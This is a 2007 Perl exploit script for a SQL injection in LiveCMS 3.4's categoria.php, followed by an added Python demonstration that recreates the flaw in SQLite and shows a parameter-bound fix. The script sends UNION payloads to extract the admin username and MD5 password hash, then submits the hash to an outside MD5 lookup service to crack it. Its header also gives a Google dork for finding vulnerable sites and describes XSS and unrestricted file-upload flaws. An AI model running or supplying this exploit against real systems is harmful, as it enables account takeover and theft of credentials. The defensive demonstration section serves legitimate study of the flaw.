LiveCMS <= 3.4 (categoria.php cid) Remote SQL Injection Exploit
Source: TrinTiTTY [at] g00ns.net   Author: TrinTiTTY   Published: 2007-06-21
#!/usr/bin/perl
##############################################################################################
#         ___   ___                         _
#        / _ \ / _ \                       | |
#   __ _| | | | | | |_ __  ___   _ __   ___| |_
#  / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
# | (_| | |_| | |_| | | | \__ \_| | | |  __/ |_
#  \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
#   __/ |
#  |___/
###############################################################################################
#INFO:
#Program Title ################################################################################
#LiveCMS <= 3.4 SQL Injection, Absolute Path Disclosure, XSS Injection, Arbitrary File Upload
#
#Description ##################################################################################
#This is a free CMS system.
#
#Script Download ##############################################################################
#http://sourceforge.net/project/downloading.php?group_id=78735&use_mirror=ufpr&filename=livecms-3.4.tar.gz&12060460
#http://livecms.com
#
#Original Advisory #############################################################################
#http://www.g00ns-forum.net/showthread.php?t=9350
#
#Exploit #######################################################################################
#credz to Vipsta and Clorox for vulnerability
#[c]ode by TrinTiTTY (2007) www.g00ns.net
#shoutz: z3r0, milf, blackhill, godxcel, murderskillz, katalyst, SyNiCaL, OD, pr0be, rezen, str0ke,
#fish, rey, canuck, c0ma, sick, trin, a59, seven, fury, <S>, Bernard, and everyone else at g00ns.net
#
#Details #######################################################################################
#APD: The absolute path is disclosed in a MySQL error when categoria.php's parameter cid is given a value that
#breaks the query. Example: categoria.php?cid='
#XSS: Article names are not properly sanitised; a user could insert malicious JavaScript.
#AFU: Articles can have a small image uploaded with them, but LiveCMS fails to restrict which file types
#can be uploaded. A user could upload a malicious script this way and compromise the server.
#GoogleDork: "powered by livecms"
#
################################################################################################
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
#                LiveCMS <= 3.4  [ categoria.php ]               #
#                    ] Remote SQL Injection [                    #
#                                                                #
#              [c]ode by TrinTiTTY [at] g00ns.net                #
#              Vulnerability by Vipsta and Clorox                #
#                                                                #
#                                                                #
#  [irc.g00ns.net]       [www.g00ns.net]        [ts.g00ns.net]   #
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#

use strict;
use warnings;
use LWP::UserAgent;

my $host = $ARGV[0];
my $ua   = LWP::UserAgent->new;

# categoria.php pastes cid straight into its SQL, so a UNION with the same
# number of columns as the article query (six) appends one row from live_admin.
# The third column is rendered as the article link text, which is where the
# selected value shows up; the trailing /* comments out the rest of the query.
my $uject = 'categoria.php?cid=1%20UNION%20ALL%20SELECT%201,2,user,4,5,6%20FROM%20live_admin%20WHERE%20userid=1/*';
my $pject = 'categoria.php?cid=1%20UNION%20ALL%20SELECT%201,2,pass,4,5,6%20FROM%20live_admin%20WHERE%20userid=1/*';

if (@ARGV < 1) { top(); usage(); }
elsif ($host =~ m{http://}) { print "\n\n [-] Don't use http:// in host\n"; exit 0; }
else { getUser(); }

# "color" is a cmd.exe built-in; only call it on Windows so the script does
# not print "command not found" everywhere else.
sub color {
    my ($c) = @_;
    system("color $c") if $^O eq 'MSWin32';
}

sub getUser {
    color(4);
    top();
    print "\n [~] Retrieving admin username\n";
    my $namecon = $ua->get("http://$host/$uject")->content;

    # The injected value is printed as a link inside a table cell; capture the
    # link text. This takes the first matching cell, so on a category that
    # already lists articles the first hit may be an article title instead.
    if ($namecon =~ m{<td>(.*)a href="(.*)"(.*)>(.*)</a></td>}mi) {
        my $user = $4;
        print "\n [+] Admin user retrieved: $user\n";
        print "\n [~] Retrieving password for $user\n";
    }
    else {
        print "\n [-] Unable to retrieve admin username\n";
        print "\n [~] Retrieving password\n";
    }
    getPass();
}

sub getPass {
    my $passcon = $ua->get("http://$host/$pject")->content;

    # live_admin.pass is an MD5 hex digest: require exactly 32 hex characters
    # so an article title cannot be mistaken for the hash.
    if ($passcon =~ m{<td>(.*)a href="(.*)"(.*)>([a-f0-9]{32})</a></td>}mi) {
        my $pass = $4;
        print "\n [+] Admin password retrieved: $pass\n";
        resolveHash($pass);
    }
    else {
        print "\n [-] Unable to retrieve admin password\n";
    }
    color(7);
    exit 0;
}

sub resolveHash {
    my ($hash) = @_;
    print "\n [~] Attempting to resolve hash\n";
    # Looks the digest up in gdataonline.com's MD5 database (thx gdata). The
    # service and the HTML layout matched below are as of 2007.
    my $hashans = LWP::UserAgent->new->get("http://gdataonline.com/qkhash.php?mode=txt&hash=$hash")->content;
    if ($hashans =~ m{width="35%"><b>([ -_a-z0-9.*?&=;<>/"]{1,25})</b></td>}) {
        print "\n [+] Password hash resolved: $1\n";
    }
    else {
        print "\n [-] Couldn't resolve hash\n";
    }
}

sub top {
    print q{
  ##################################################################
  #                LiveCMS <= 3.4  [ categoria.php ]               #
  #                    ] Remote SQL Injection [                    #
  #                                                                #
  #                [c]ode by TrinTiTTY [at] g00ns.net              #
  #                Vulnerability by Vipsta and Clorox              #
  ##################################################################
  };
}

sub usage {
    print "\n Usage: perl livecms33.pl <host>\n";
    print "\n Example: perl livecms33.pl www.example.com/path\n\n";
    exit 0;
}
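The following is an added, self-contained example (not part of the original exploit, and not LiveCMS's own code) that reproduces the mechanics the script relies on against an in-memory SQLite database: a category query that interpolates cid unquoted, the two UNION payloads from the script pulling live_admin.user and live_admin.pass into the title column, the page's regexes harvesting them from the rendered link text, the quote-character error behind the path-disclosure finding, and a hardened query that whitelists cid as an integer and binds it. The table layout, the `articles` schema, the `articolo.php` link target and the admin row are all constructed for the demonstration; only `live_admin`, its `user`, `pass` and `userid` columns and the payloads come from the exploit.

```python
import re
import sqlite3

# Constructed fixture, not LiveCMS's real schema: a six-column article table
# (the exploit's UNION supplies six values, so the category query must select
# six columns) plus the live_admin table the exploit reads from.
SCHEMA = """
CREATE TABLE articles(id INTEGER, cid INTEGER, title TEXT, body TEXT, img TEXT, author TEXT);
CREATE TABLE live_admin(userid INTEGER, user TEXT, pass TEXT);
INSERT INTO articles VALUES (1, 1, 'Welcome', 'First post', 'welcome.gif', 'editor');
INSERT INTO articles VALUES (2, 2, 'Other', 'Not in cid 1', 'other.gif', 'editor');
INSERT INTO live_admin VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""

# The two payloads from the Perl script, URL-decoded.
USER_PAYLOAD = "1 UNION ALL SELECT 1,2,user,4,5,6 FROM live_admin WHERE userid=1/*"
PASS_PAYLOAD = "1 UNION ALL SELECT 1,2,pass,4,5,6 FROM live_admin WHERE userid=1/*"


def open_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def category_query_vulnerable(con, cid):
    # Assumed shape of the flaw: cid is pasted into the statement unquoted and
    # unvalidated, so the attacker owns everything after "cid=". The trailing
    # "/*" in the payload comments out the ORDER BY; SQLite, like MySQL, accepts
    # an unterminated block comment.
    sql = ("SELECT id, cid, title, body, img, author FROM articles "
           f"WHERE cid={cid} ORDER BY id DESC")
    return con.execute(sql).fetchall()


def category_query_hardened(con, cid):
    # Fix: whitelist the value as a positive integer, then bind it as a parameter.
    if not re.fullmatch(r"[0-9]+", str(cid)):
        raise ValueError("cid must be a positive integer")
    sql = ("SELECT id, cid, title, body, img, author FROM articles "
           "WHERE cid=? ORDER BY id DESC")
    return con.execute(sql, (int(cid),)).fetchall()


def hardened_rejects(con, cid):
    try:
        category_query_hardened(con, cid)
    except ValueError:
        return True
    return False


def db_error_for(con, cid):
    # What the path-disclosure finding relies on: a bad value makes the
    # database throw, and the page prints that error (MySQL's, with the
    # script's absolute path, in the real application).
    try:
        category_query_vulnerable(con, cid)
    except sqlite3.Error as e:
        return str(e)
    return None


def render(rows):
    # Hypothetical page template: the third column is shown as link text, one
    # <td> per line, which is the layout the exploit's regexes assume.
    return "\n".join(
        f'<tr><td><a href="articolo.php?id={r[0]}">{r[2]}</a></td></tr>' for r in rows
    )


# Same patterns the Perl script applies to the response body.
LINK_TEXT = re.compile(r'<td>(.*)a href="(.*)"(.*)>(.*)</a></td>', re.I)
MD5_TEXT = re.compile(r'<td>(.*)a href="(.*)"(.*)>([a-f0-9]{32})</a></td>', re.I)


def leaked_link_texts(html):
    return [m.group(4) for m in LINK_TEXT.finditer(html)]


def leaked_hash(html):
    m = MD5_TEXT.search(html)
    return m.group(4) if m else None


def demo():
    con = open_db()
    users = leaked_link_texts(render(category_query_vulnerable(con, USER_PAYLOAD)))
    digest = leaked_hash(render(category_query_vulnerable(con, PASS_PAYLOAD)))
    blocked = hardened_rejects(con, USER_PAYLOAD)
    return users, digest, blocked


if __name__ == "__main__":
    print(demo())
```

Two things the run makes visible. The username page contains both the genuine article row and the injected row, and the script's username regex simply takes the first cell that matches, so on a category that already has articles the "admin user" it prints can be an article title; the password regex's `[a-f0-9]{32}` constraint is what keeps the hash lookup reliable. On the defensive side, the integer whitelist plus parameter binding closes the injection and, because no attacker-controlled text ever reaches the parser, also removes the error path used for the absolute-path disclosure (suppressing database error output to the browser is still worth doing separately).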